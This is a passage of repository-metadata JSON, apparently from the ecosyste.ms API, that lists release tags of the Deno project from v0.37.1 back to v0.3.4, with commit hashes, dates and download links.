/repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","ma